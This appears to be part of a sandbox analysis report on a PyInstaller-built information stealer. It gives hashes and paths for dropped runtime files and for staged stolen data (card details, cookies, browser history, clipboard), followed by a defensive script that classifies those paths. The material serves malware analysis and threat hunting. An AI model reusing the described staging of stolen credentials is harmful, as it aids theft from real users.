| SHA512 | ff03c361adaf5e14101083e9374e8b85f0b74bda2b6c05a0739237b397fa02dbfa8b6b8cadc4ded1d9b64e8ae63d040e1b6ed2cc3947451b6c3f58ed7bfc1cd0 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\unicodedata.pyd
| MD5 | 1e73c365bb5c3b10def5b168c17cf33d |
| SHA1 | dbcee0e7c69c1e33804d45d677e32b7d00fcf4d5 |
| SHA256 | 6c2c45ef24c6797ee92997417dd142e4447d410fae63c7969db615caed9327ba |
| SHA512 | cc0a051a0ccba78829205af134d4195143a767cd80dccb74a9580ac32a8a1e3223febf2ee4d278e89003dd28fe3ea6bbe9ab292c9050c1e24a52a7142436463f |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\sqlite3.dll
| MD5 | c349095f35ef7831444a5612f86e856c |
| SHA1 | d158144d557777cc2464cbd39ddf8c15be48be2f |
| SHA256 | bfe78fe2b54df778c0d62144b1308f1f149bed79ea6bd628ffd76cbc5406cd1a |
| SHA512 | 9bd17fc8ce0057e58d18c6ed327225636cab6599b2d743ee159f3987a9d79a761a240ec6133f503991e09746540b0c595708043e1d31d3934b185b117583b737 |
memory/5956-200-0x00007FFED8D90000-0x00007FFED8DBD000-memory.dmp
memory/5956-199-0x00007FFED8DC0000-0x00007FFED8DDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_lzma.pyd
| MD5 | a03ab3a9a7d7486e4a4333453e0baef9 |
| SHA1 | a2fc8b3bb3b3c869b0c43d584f2c667cbbb5a25f |
| SHA256 | b5dffb38a8a869abef827789f12d75ceb6125335be12a7a990c78d8e8417b674 |
| SHA512 | e2b341474b60b0f144c03e40ba473c93fc4378a7dcb0385875bec52839d9f5b9e87944801014df177fca740eeb15718da5ae810c66051b785c37c6bac9c51276 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_bz2.pyd
| MD5 | ba261cfff9d982be6c64982215f937bc |
| SHA1 | 435ebd684adc41d632e35513b0b8511a7d19ee33 |
| SHA256 | 1ac8ca1558305fcdd975b7846c48e006500629bb5639634958e70b51c62762c5 |
| SHA512 | b7597a1ea8118e8604b32f7c4f38ffed05748c18180866570f8820e84840ed4256df1bf5802896aed947ca4b7b99483a48401fe485da48d578ff01457bcfcb0c |
memory/5956-193-0x00007FFED8DE0000-0x00007FFED8E05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI55082\libffi-8.dll
| MD5 | ae513b7cdc4ee04687002577ffbf1ff4 |
| SHA1 | 7d9a5eb0ac504bc255e80055d72e42ccb7ab7b4d |
| SHA256 | ed18fc7eee1bf09d994d8eba144e4e7d1e6a030ba87888001eea550d7afffada |
| SHA512 | 9fcb24debfaf035a3604a2a9abece0655424f981ebb0afef14b9674e57030dea8c5c230ca8cc13c10de8422777b4c549002350f62b9259c486cca841d9c81634 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_ctypes.pyd
| MD5 | be90d040a4bb2b0ac6a57298c56405e9 |
| SHA1 | 08fa52b63ec9d9a1a4daa3caba22bae81f794ad3 |
| SHA256 | 3c52af0a44d768a2cdaaa2163d438f09a5913fec85a01b7d591116e9fbd743b1 |
| SHA512 | 5f300657bee15555d54dcc99355c6fbd42a4c05dc76cd3c942daa16895043c50cbd15a77b77d594819a9ed10fe73cdf98fbb49b6a87081b317f66e3ba06ed873 |
memory/5956-351-0x00007FFED7D00000-0x00007FFED7D0B000-memory.dmp
memory/5956-353-0x00007FFED8DE0000-0x00007FFED8E05000-memory.dmp
memory/5956-363-0x00007FFED8D10000-0x00007FFED8D43000-memory.dmp
memory/5956-362-0x00007FFED65F0000-0x00007FFED6B19000-memory.dmp
memory/5956-369-0x00007FFED6470000-0x00007FFED65EE000-memory.dmp
memory/5956-364-0x00007FFED8C40000-0x00007FFED8D0D000-memory.dmp
memory/5956-352-0x00007FFED6B20000-0x00007FFED71E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\QgTIhQ1HNR\Browser\history.txt
| MD5 | 5638715e9aaa8d3f45999ec395e18e77 |
| SHA1 | 4e3dc4a1123edddf06d92575a033b42a662fe4ad |
| SHA256 | 4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6 |
| SHA512 | 78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b |
C:\Users\Admin\AppData\Local\Temp\QgTIhQ1HNR\Browser\cc's.txt
| MD5 | 5aa796b6950a92a226cc5c98ed1c47e8 |
| SHA1 | 6706a4082fc2c141272122f1ca424a446506c44d |
| SHA256 | c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c |
| SHA512 | 976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad |
memory/5956-397-0x00007FFEF2870000-0x00007FFEF287F000-memory.dmp
memory/5956-426-0x00007FFED93F0000-0x00007FFED93FC000-memory.dmp
memory/5956-438-0x00007FFED7290000-0x00007FFED729C000-memory.dmp
memory/5956-446-0x00007FFED6030000-0x00007FFED605E000-memory.dmp
memory/5956-447-0x00007FFEF2870000-0x00007FFEF287F000-memory.dmp
memory/5956-445-0x00007FFED6060000-0x00007FFED6089000-memory.dmp
memory/5956-444-0x00007FFED60A0000-0x00007FFED62E5000-memory.dmp
memory/5956-443-0x00007FFED62F0000-0x00007FFED62FC000-memory.dmp
memory/5956-442-0x00007FFED6300000-0x00007FFED6312000-memory.dmp
memory/5956-441-0x00007FFED6330000-0x00007FFED633C000-memory.dmp
memory/5956-440-0x00007FFED6320000-0x00007FFED632D000-memory.dmp
memory/5956-439-0x00007FFED6340000-0x00007FFED634C000-memory.dmp
memory/5956-437-0x00007FFED7270000-0x00007FFED727B000-memory.dmp
memory/5956-436-0x00007FFED7280000-0x00007FFED728B000-memory.dmp
memory/5956-435-0x00007FFED8DE0000-0x00007FFED8E05000-memory.dmp
memory/5956-432-0x00007FFED72A0000-0x00007FFED72AE000-memory.dmp
memory/5956-431-0x00007FFED72B0000-0x00007FFED72BC000-memory.dmp
memory/5956-430-0x00007FFED72C0000-0x00007FFED72CC000-memory.dmp
memory/5956-429-0x00007FFED7D00000-0x00007FFED7D0B000-memory.dmp
memory/5956-428-0x00007FFED80D0000-0x00007FFED80DC000-memory.dmp
memory/5956-427-0x00007FFED8670000-0x00007FFED867B000-memory.dmp
memory/5956-423-0x00007FFED6350000-0x00007FFED646B000-memory.dmp
memory/5956-422-0x00007FFED72D0000-0x00007FFED72F7000-memory.dmp
memory/5956-421-0x00007FFEE36E0000-0x00007FFEE36EB000-memory.dmp
memory/5956-420-0x00007FFED7300000-0x00007FFED7387000-memory.dmp
memory/5956-419-0x00007FFED8BE0000-0x00007FFED8BF8000-memory.dmp
memory/5956-418-0x00007FFED6470000-0x00007FFED65EE000-memory.dmp
memory/5956-417-0x00007FFED7390000-0x00007FFED73B4000-memory.dmp
memory/5956-416-0x00007FFED80E0000-0x00007FFED8115000-memory.dmp
memory/5956-415-0x00007FFED8C00000-0x00007FFED8C12000-memory.dmp
memory/5956-414-0x00007FFED8C20000-0x00007FFED8C36000-memory.dmp
memory/5956-413-0x00007FFED8C40000-0x00007FFED8D0D000-memory.dmp
memory/5956-434-0x00007FFEE9660000-0x00007FFEE966F000-memory.dmp
memory/5956-410-0x00007FFED8D50000-0x00007FFED8D64000-memory.dmp
memory/5956-409-0x00007FFEE5CB0000-0x00007FFEE5CBD000-memory.dmp
memory/5956-408-0x00007FFEE6770000-0x00007FFEE677D000-memory.dmp
memory/5956-407-0x00007FFED8D70000-0x00007FFED8D89000-memory.dmp
memory/5956-406-0x00007FFEE88A0000-0x00007FFEE88AD000-memory.dmp
memory/5956-405-0x00007FFED8D90000-0x00007FFED8DBD000-memory.dmp
memory/5956-404-0x00007FFED8DC0000-0x00007FFED8DDA000-memory.dmp
memory/5956-401-0x00007FFED6B20000-0x00007FFED71E5000-memory.dmp
memory/5956-425-0x00007FFED9530000-0x00007FFED953B000-memory.dmp
memory/5956-424-0x00007FFEE0E30000-0x00007FFEE0E3B000-memory.dmp
memory/5956-411-0x00007FFED65F0000-0x00007FFED6B19000-memory.dmp
memory/5956-412-0x00007FFED8D10000-0x00007FFED8D43000-memory.dmp
memory/376-577-0x00007FFEDAA40000-0x00007FFEDB105000-memory.dmp
memory/376-579-0x00007FFEF2850000-0x00007FFEF285F000-memory.dmp
memory/376-578-0x00007FFEEA0C0000-0x00007FFEEA0E5000-memory.dmp
memory/376-581-0x00007FFEEA050000-0x00007FFEEA07D000-memory.dmp
memory/376-580-0x00007FFEEA3B0000-0x00007FFEEA3CA000-memory.dmp
memory/376-584-0x00007FFEE9B60000-0x00007FFEE9B6D000-memory.dmp
memory/376-583-0x00007FFEE9D00000-0x00007FFEE9D19000-memory.dmp
memory/376-582-0x00007FFEEA0B0000-0x00007FFEEA0BD000-memory.dmp
memory/376-585-0x00007FFEE9B50000-0x00007FFEE9B5D000-memory.dmp
memory/376-587-0x00007FFEDA510000-0x00007FFEDAA39000-memory.dmp
memory/376-586-0x00007FFEE9430000-0x00007FFEE9444000-memory.dmp
memory/376-589-0x00007FFEDA440000-0x00007FFEDA50D000-memory.dmp
memory/376-588-0x00007FFEE93F0000-0x00007FFEE9423000-memory.dmp
memory/376-591-0x00007FFEE93B0000-0x00007FFEE93C2000-memory.dmp
memory/376-590-0x00007FFEE93D0000-0x00007FFEE93E6000-memory.dmp
memory/376-592-0x00007FFEDAA40000-0x00007FFEDB105000-memory.dmp
memory/376-595-0x00007FFEEA0C0000-0x00007FFEEA0E5000-memory.dmp
memory/376-596-0x00007FFEDA280000-0x00007FFEDA3FE000-memory.dmp
memory/376-597-0x00007FFED9BC0000-0x00007FFED9BD8000-memory.dmp
memory/376-599-0x00007FFED98D0000-0x00007FFED9957000-memory.dmp
memory/376-598-0x00007FFEEA0B0000-0x00007FFEEA0BD000-memory.dmp
memory/376-594-0x00007FFEE9380000-0x00007FFEE93A4000-memory.dmp
memory/376-593-0x00007FFEDA400000-0x00007FFEDA435000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\0Fyulgn2H4\Browser\roblox cookies.txt
| MD5 | de9ec9fc7c87635cb91e05c792e94140 |
| SHA1 | 3f0fbeaff23a30040e5f52b78b474e7cb23488ab |
| SHA256 | aac2a87a65cbbe472000734bd6db5c76f0ffed78e80928f575d5573f3ac94d0f |
| SHA512 | a18ff0f277d880cf249fe7ef20fa026fd8126121fbb6f1de33d3d4a08d37084c662724053c6e8e2035aa7c347000e14a9c12698017ac72b327db6473d6e4af56 |
C:\Users\Admin\AppData\Local\Temp\0Fyulgn2H4\Browser\cookies.txt
| MD5 | 357c18b5c470aa5214819ed2e11882f9 |
| SHA1 | 262726528ac6ece5ef69b48cbf69e9d3c79bbc2d |
| SHA256 | e04233c3a65810f382471c2c1484cc71df6f2078d56bd91f478ed99790ac11f5 |
| SHA512 | a84eaa0f8466ef145e765b3c340120a7947aad6ded63c301be5a5c4dea15f603ae0a295c8d7d9828a8f660edfa058edf96abc6950eebbbafe3af402a4b37d683 |
C:\Users\Admin\AppData\Local\Temp\0Fyulgn2H4\Clipboard\clipboard.txt
| MD5 | 3f86226eca1b8b351d9c5b11dcdbcdfa |
| SHA1 | 576f70164e26ad8dbdb346cd72c26323f10059ac |
| SHA256 | 0d50f046634b25bcfc3ffb0a9feff8ab43e662c8872df933cb15b68050a5bb8c |
| SHA512 | 150d95510e0f83ef0e416e1a18663a70f85ff4d09c620fcf355b18df3e939d232054a5be5bbb1b22e050167e61c243d7e89e13c0770cfedbae49b1b8e10d8753 |
C:\Users\Admin\tmp\ecC7oLKJfv
| MD5 | 42c395b8db48b6ce3d34c301d1eba9d5 |
| SHA1 | b7cfa3de344814bec105391663c0df4a74310996 |
| SHA256 | 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d |
| SHA512 | 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96ff1ee586a153b4e7ce8661cabc0442 |
| SHA1 | 140d4ff1840cb40601489f3826954386af612136 |
| SHA256 | 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8 |
| SHA512 | 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569 |
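The file list mixes four very different things: the PyInstaller onefile runtime unpacked into `Temp\_MEI55082` (the number is the bootloader's PID, which is why it differs per run), the stealer's own output staged under random ten-character directories (`QgTIhQ1HNR\Browser\cc's.txt`, `0Fyulgn2H4\Clipboard\clipboard.txt`), Edge profile files the sample read, and PowerShell's start-up artifacts (`__PSScriptPolicyTest_*.ps1`, `StartupProfileData-NonInteractive`), which appear whenever PowerShell runs and are not themselves indicators. The crashpad pipe entry carries the digests of empty input. The Python below is an added example, not part of this report or the sandbox, that buckets such entries and sanity-checks the listed hashes; entries are constructed from the tables above and the ten-character directory pattern is an assumption drawn from the two names seen here.

```python
"""Classify dropped/accessed file paths from a sandbox report and
sanity-check the listed digests (added example).

Buckets: PyInstaller onefile extraction dir (_MEI<pid>), stealer staging
dirs (random name + Browser\\ or Clipboard\\), browser profile files the
sample read, PowerShell start-up artifacts, and browser downloads.
SAMPLE_ENTRIES is constructed from the report above.
"""
import hashlib
import re

SAMPLE_ENTRIES = [
    (r"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences",
     {"MD5": "fd55948dc6d984a216e62bbba4c84301"}),
    (r"\??\pipe\LOCAL\crashpad_3988_KADAAEXRPJGWHHEA",
     {"MD5": "d41d8cd98f00b204e9800998ecf8427e",
      "SHA1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
      "SHA256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}),
    (r"C:\Users\Admin\AppData\Local\Temp\_MEI55082\python312.dll",
     {"MD5": "8f9e3a154ef42634941f6b8b0e7596d5"}),
    (r"C:\Users\Admin\AppData\Local\Temp\_MEI55082\_sqlite3.pyd",
     {"MD5": "9a5b2c0290df382355e1205966f5e824"}),
    (r"C:\Users\Admin\AppData\Local\Temp\QgTIhQ1HNR\Browser\cc's.txt",
     {"MD5": "5aa796b6950a92a226cc5c98ed1c47e8"}),
    (r"C:\Users\Admin\AppData\Local\Temp\0Fyulgn2H4\Clipboard\clipboard.txt",
     {"MD5": "3f86226eca1b8b351d9c5b11dcdbcdfa"}),
    (r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ooh3nfbc.1ss.ps1",
     {"MD5": "d17fe0a3f47be24a6453e9ef58c94641"}),
    (r"C:\Users\Admin\Downloads\Unconfirmed 904369.crdownload",
     {"MD5": "1e79b60d975dc664b5affeab606a41fb"}),
]

# First matching rule wins.  The ten-character staging-dir name is an
# assumption based on the two directories in the report.
RULES = [
    ("pyinstaller_runtime", re.compile(r"\\Temp\\_MEI\d+\\", re.I)),
    ("stealer_output",      re.compile(r"\\Temp\\[A-Za-z0-9]{10}\\(Browser|Clipboard)\\", re.I)),
    ("browser_profile",     re.compile(r"\\User Data\\", re.I)),
    ("powershell_artifact", re.compile(r"__PSScriptPolicyTest_.*\.ps1$|\\PowerShell\\StartupProfileData", re.I)),
    ("download",            re.compile(r"\.crdownload$", re.I)),
]

# Digests of empty input, one per algorithm the report lists.
EMPTY = {a: getattr(hashlib, a.lower())(b"").hexdigest()
         for a in ("MD5", "SHA1", "SHA256", "SHA512")}


def classify(path):
    for name, rx in RULES:
        if rx.search(path):
            return name
    return "other"


def check_hashes(digests):
    """Return problems: malformed hex, or a digest that is just the empty string's."""
    problems = []
    for algo, hexval in digests.items():
        if algo not in EMPTY:
            problems.append(f"{algo}: unknown algorithm")
            continue
        if not re.fullmatch(r"[0-9a-f]{%d}" % len(EMPTY[algo]), hexval):
            problems.append(f"{algo}: malformed")
        elif hexval == EMPTY[algo]:
            problems.append(f"{algo}: digest of empty input")
    return problems


def report(entries):
    out = {name: [] for name, _ in RULES}
    out["other"] = []
    out["empty_content"] = []
    out["extraction_dirs"] = set()
    for path, digests in entries:
        out[classify(path)].append(path)
        m = re.search(r"\\(_MEI\d+)\\", path)
        if m:
            out["extraction_dirs"].add(m.group(1))
        if any("empty input" in p for p in check_hashes(digests)):
            out["empty_content"].append(path)
    return out


if __name__ == "__main__":
    for bucket, paths in report(SAMPLE_ENTRIES).items():
        print(bucket, paths)
```

For hunting, the durable indicators are the staging layout (`%TEMP%\<random>\Browser\*.txt`, `\Clipboard\clipboard.txt`) and the hash of the dropped payload, not the `_MEI` runtime files: `python312.dll`, `libcrypto-3.dll` and the `.pyd` modules are stock CPython 3.12 binaries that any PyInstaller-built program, benign or not, will unpack.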